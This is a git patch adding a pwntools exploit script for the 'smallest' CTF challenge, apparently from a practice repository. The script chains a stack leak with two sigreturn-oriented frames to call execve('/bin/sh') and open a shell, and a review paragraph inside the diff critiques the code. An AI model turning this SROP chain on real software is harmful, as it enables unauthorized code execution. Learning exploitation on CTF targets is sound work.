From 0c02788672de202c394f634ba7ed105906e71d80 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Wed, 19 Jan 2022 23:36:01 +0800
Subject: [PATCH] Finished ROP/SROP/360chunqiu2017_smallest

---
 ROP/SROP/360chunqiu2017_smallest/exp.py | 58 ++++++++++++++++++++++
 ROP/SROP/360chunqiu2017_smallest/smallest | Bin 0 -> 408 bytes
 2 files changed, 58 insertions(+)
 create mode 100755 ROP/SROP/360chunqiu2017_smallest/exp.py
 create mode 100755 ROP/SROP/360chunqiu2017_smallest/smallest

diff --git a/ROP/SROP/360chunqiu2017_smallest/exp.py b/ROP/SROP/360chunqiu2017_smallest/exp.py
new file mode 100755
index 0000000..b86547f
--- /dev/null
+++ b/ROP/SROP/360chunqiu2017_smallest/exp.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python2
+from pwn import *
+import time
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+p = process('./smallest')
+elf = ELF('./smallest')
+#gdb.attach(p, 'b *0x4000C0')
+time.sleep(1)
+
+CLEAR_EAX_READ_ADDR = 0x4000B0
+READ_ADDR = 0x4000B3
+SYSCALL_ADDR = 0x4000BE
+RET_ADDR = 0x4000C0
+
+payload = ""
+payload += p64(CLEAR_EAX_READ_ADDR) # Set Syscall ID(write, 1) to RAX: Input 15 Characters
+payload += p64(READ_ADDR) # write(stdout, rsp, 0x400)
+payload += p64(CLEAR_EAX_READ_ADDR) # Back to read()
+
+p.send(payload)
+raw_input()
+p.send('\xb3') # Low Byte of READ_ADDR
+p.recv(0x8)
+leak_stack = u64(p.recv(0x8)) & 0xffffffffffff0000
+bin_sh_addr = leak_stack + 0x300
+print("leak stack: ", hex(leak_stack))
+raw_input()
+
+payload = p64(CLEAR_EAX_READ_ADDR) # Set Syscall ID(rt_sigreturn, 15) to RAX: Input 15 Characters
+payload += p64(SYSCALL_ADDR) # Do rt_sigreturn() Syscall
+frame = SigreturnFrame()
+frame.rax = constants.SYS_read # do read
+frame.rdi = 0 # fd
+frame.rsi = leak_stack # buf
+frame.rdx = 0x500 # count
+frame.rip = SYSCALL_ADDR
+frame.rsp = leak_stack # migrate stack to leak_stack
+payload += bytes(frame)
+p.send(payload)
+raw_input()
+p.send(p64(SYSCALL_ADDR) + '\x00' * 7)
+raw_input()
+
+payload = p64(CLEAR_EAX_READ_ADDR) # Set Syscall ID(rt_sigreturn, 15) to RAX: Input 15 Characters
+payload += p64(SYSCALL_ADDR) # Do rt_sigreturn() Syscall
+frame = SigreturnFrame()
+frame.rax = constants.SYS_execve
+frame.rdi = bin_sh_addr
+frame.rip = SYSCALL_ADDR
+frame.rsp = leak_stack # migrate stack to leak_stack
+payload += bytes(frame)
+payload += (0x300-len(payload)) * 'A' + "/bin/sh\x00"
+p.send(payload)
+raw_input()
+p.send(p64(SYSCALL_ADDR) + '\x00' * 7)
+raw_input()
+p.interactive()
\ No newline at end of file
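Review bot: The stack leak on the `leak_stack = u64(p.recv(0x8)) & ...` line assumes the second `recv(0x8)` yields exactly eight bytes, but pwntools `recv(n)` returns *up to* n bytes, so a short read makes `u64` raise and the rest of the 0x400-byte `write` dump stays queued in the tube; both reads should be `p.recvn(8)` (`p.recvn(8)` then `leak_stack = u64(p.recvn(8)) & 0xffffffffffff0000`), followed by `p.clean()` so the remaining stack bytes do not spill into `interactive()`. The comment on the first `payload += p64(CLEAR_EAX_READ_ADDR)` line ("Set Syscall ID(write, 1) to RAX: Input 15 Characters") looks copied from the later sigreturn stages; this stage sends a single byte (`p.send('\xb3')`) so that `read` returns 1 and `rax` becomes the `write` syscall number, and I would reword it to `# read() returns 1 byte -> rax = 1 = SYS_write`. The `& 0xffffffffffff0000` mask and the `+ 0x300` placement of "/bin/sh" presume the leaked qword is a stack pointer and that the rounded-down address plus 0x300 is mapped and writable, which cannot be checked here because the target is only present as a binary patch; a one-line comment stating that assumption next to `bin_sh_addr` would help. The script is Python 2 only (`'\xb3'` and `'A'` str concatenated with `bytes(frame)`, `raw_input()`), which the shebang makes explicit but is worth recording in the directory README since python2 is end-of-life.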
diff --git a/ROP/SROP/360chunqiu2017_smallest/smallest b/ROP/SROP/360chunqiu2017_smallest/smallest new file mode 100755 index 0000000000000000000000000000000000000000..96b59a183eb1283913b623e7936951f05a29518b GIT binary patch literal 408 zcmb<-^>JfjWMqH=CI&kO5N`v616T+`GBDf#^B{x+g9QT